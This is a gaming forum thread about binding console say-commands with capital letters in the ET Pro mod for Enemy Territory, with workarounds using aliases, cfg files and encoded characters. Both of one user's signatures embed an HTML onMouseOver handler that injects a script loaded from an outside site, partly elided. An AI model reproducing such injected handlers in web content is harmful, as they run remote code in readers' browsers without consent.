Bind capital letters? :(

Discussion for Bani's Tournament Mod

Moderators: Forum moderators, developers

forsen

Bind capital letters? :(

Post by forsen »

You cant, for instance, bind "say Tralal". It´ll just come out "tralal" without a big T. An easy problem to fix i assume so please do it =)

Thanks! :O)
Deus

Post by Deus »

set blabla "say Tralal"
bind x vstr blabla

^^ works fine
forsen

Post by forsen »

Ahh, worked great! Thanks alot!
S0und

Post by S0und »

bind v "weaponbank 4; cmd say_team "^1> ^O=47 ^U=52 ^O=41 ^U=4e ^O=41 ^U=54^1 <"
.: S0und :.
DieZel

Post by DieZel »

[pH*Deus] wrote:set blabla "say Tralal"
bind x vstr blabla
Waste of a perfectly good alias tbh. I get max_cvars errors as it is, it seems like such a waste to do simple say commands using aliases.
bind v "weaponbank 4; cmd say_team "^1> ^O=47 ^U=52 ^O=41 ^U=4e ^O=41 ^U=54^1 <"
Way too complicated, especially if you're like me and do say binds on the fly via the console. Plus, the same binds couldn't be used on etmain servers.

A workaround I've been using is to make a cfg file "say_medic.cfg" that has a single command:
say_team "Going MEDIC"
and then make a bind:
bind x "exec say_medic.cfg"

No aliases wasted, but there are a helluva lot of .cfg files. Even with subdirectories they're hard to keep track of.

And of course every time you exec something, a line "execing filename.cfg" appears in the console.
daemord

Post by daemord »

this has always been a headache for me, as stated there are work arounds, but surely it wouldnt be that hard for the ET Pro squad to fix it.
Rain

Post by Rain »

The engine is responsible for the lowercasing at bind time. There's nothing we can do about it.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
squadjot

Post by squadjot »

S0und wrote:bind v "weaponbank 4; cmd say_team "^1> ^O=47 ^U=52 ^O=41 ^U=4e ^O=41 ^U=54^1 <"
is the cmd supposed to be there? ..or is it something special u do when typing it manually into console??? (not working at meh...got no problem tho :P)
IdNotFound

Post by IdNotFound »

squadjot wrote:
S0und wrote:bind v "weaponbank 4; cmd say_team "^1> ^O=47 ^U=52 ^O=41 ^U=4e ^O=41 ^U=54^1 <"
is the cmd supposed to be there? ..or is it something special u do when typing it manually into console??? (not working at meh...got no problem tho :P)
He's using high-ascii chars, that's why the cmd.
Not sure of what exactly is he using hehehehe :P
Image nZ/IdNotFound
NaZGûL TeaM Leader
SAWL Tech Staff
Rain

Post by Rain »

If you put the encoded chars in the bind yourself (e.g. bind v "weaponbank 4; cmd say_team "^1> ^OG ^UR ^OA ^UN ^OA ^UT^1 <"), you don't need cmd. If you want to encoded the characters yourself (as was done here to avoid the lowercasing issue), you need to use cmd so that the client won't reencode them.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>